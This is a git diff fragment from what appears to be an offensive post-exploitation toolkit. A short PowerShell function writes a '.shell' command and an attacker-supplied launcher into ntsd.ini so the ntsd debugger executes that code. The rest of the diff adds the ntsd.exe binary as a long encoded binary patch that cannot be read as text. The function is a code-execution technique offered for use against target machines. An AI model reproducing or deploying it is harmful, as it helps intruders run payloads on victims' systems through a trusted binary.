Write-Ini([string]$path, [string]$launcher) +{ + # -Encoding ASCII is needed otherwise it will write in unicode + # this will cause ntsd to not execute our code + ".shell" | Out-File -Encoding ASCII "$path\ntsd.ini" + "$launcher" | Out-File -Encoding ASCII "$path\ntsd.ini" -Append +} diff --git a/data/module_source/code_execution/ntsd.exe b/data/module_source/code_execution/ntsd.exe new file mode 100644 index 0000000000000000000000000000000000000000..e726683a71bd1f706424b18e101f3363e430a465 GIT binary patch literal 98760 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

KPJ8y>(8f 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 